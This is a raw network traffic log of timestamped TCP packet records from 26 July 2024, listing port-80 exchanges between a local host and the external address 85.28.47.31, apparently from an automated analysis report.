Jul 26, 2024 20:09:11.402661085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.402664900 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.402674913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.402686119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.402690887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.402704954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.402707100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.402719975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.402729034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.402734041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.402749062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.402754068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.402765036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.402769089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.402781010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.402790070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.402795076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.402807951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.402811050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.402822018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.402825117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.402836084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.402851105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.402863979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.403553009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.403568983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.403583050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.403597116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.403597116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.403609991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.403610945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.403625965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.403628111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.403642893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.403645039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.403654099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.403660059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.403667927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.403673887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.403691053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.403691053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.403698921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.403707027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.403717995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.403722048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.403737068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.403738022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.403748989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.403752089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.403769016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.403775930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.403794050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.404465914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.404490948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.404511929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.404522896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.404526949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.404532909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.404544115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.404550076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.404560089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.404571056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.404575109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.404582024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.404591084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.404596090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.404606104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.404611111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.404622078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.404628038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.404637098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.404643059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.404652119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.404659986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.404666901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.404678106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.404689074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.404700994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.447043896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.452155113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.629482985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.629513025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.629529953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.629545927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.629563093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.629575014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.629579067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.629595995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.629614115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.629674911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.629889011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.629904985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.629920006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.629935026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.629939079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.629951000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.629966974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.629982948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.629983902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.629997015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.630012035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.630027056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.630028963 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.630053997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.630080938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.631089926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631104946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631119967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631134987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631140947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.631150007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631165028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631170988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.631180048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631195068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631208897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631223917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631238937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631263018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.631263018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.631299973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.631335974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631351948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631375074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631392002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631395102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.631437063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.631613016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631628036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631644011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631655931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.631658077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631675005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631683111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.631690979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631707907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631722927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631726027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.631738901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631753922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631759882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.631768942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631783962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631788015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.631799936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631814957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.631815910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.631839037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.631863117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.632205009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632220030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632235050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632257938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.632260084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632276058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632283926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.632288933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632306099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632322073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632328033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.632337093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632354021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632368088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632378101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.632383108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632421017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.632443905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.632863045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632879019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632894039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632909060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632914066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.632925987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632937908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.632949114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.632981062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.633002996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.633007050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633054972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.633198977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633214951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633230925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633243084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.633245945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633260965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633269072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.633276939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633291960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633306980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633311987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.633321047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633337975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.633337975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633353949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633368015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.633374929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633383989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.633389950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633421898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.633459091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.633754015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633769035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633784056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633800030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633806944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.633816004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633831978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633836985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.633846998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633862019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633869886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.633877993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633902073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633918047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633932114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633951902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.633956909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633972883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.633986950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.634002924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.634011030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.634017944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.634035110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.634038925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.634051085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.634062052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.634088993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.634697914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.634748936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.634872913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.634887934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.634903908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.634918928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.634922028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.634933949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.634948969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.634953976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.634963989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.634979963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.634996891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.635004044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.635011911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.635029078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.635044098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.635077953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.635077953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.635099888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.635938883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.635955095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.635971069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.635982990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.635986090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.636003971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.636018038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.636022091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.636033058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.636049032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.636065006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.636066914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.636091948 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.636123896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.728183985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728230000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728245974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728272915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.728400946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728418112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728427887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.728432894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728449106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728455067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.728502989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.728558064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728575945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728591919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728601933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.728605986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728622913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728647947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.728687048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.728877068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728893042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728908062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728923082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728925943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.728939056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728946924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.728955030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728971004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.728982925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.728986979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729001999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729007959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.729017019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729038954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.729074955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.729515076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729530096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729545116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729556084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.729559898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729576111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729590893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729607105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729607105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.729621887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729631901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.729638100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729652882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729659081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.729667902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729682922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.729684114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729700089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729716063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729722977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.729732037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729748011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729754925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.729763985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.729793072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.729824066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.730453968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730470896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730487108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730496883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.730503082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730518103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730531931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730537891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.730546951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730561972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730576992 CEST	80	49704	85.28.47.31	192.168.2.5
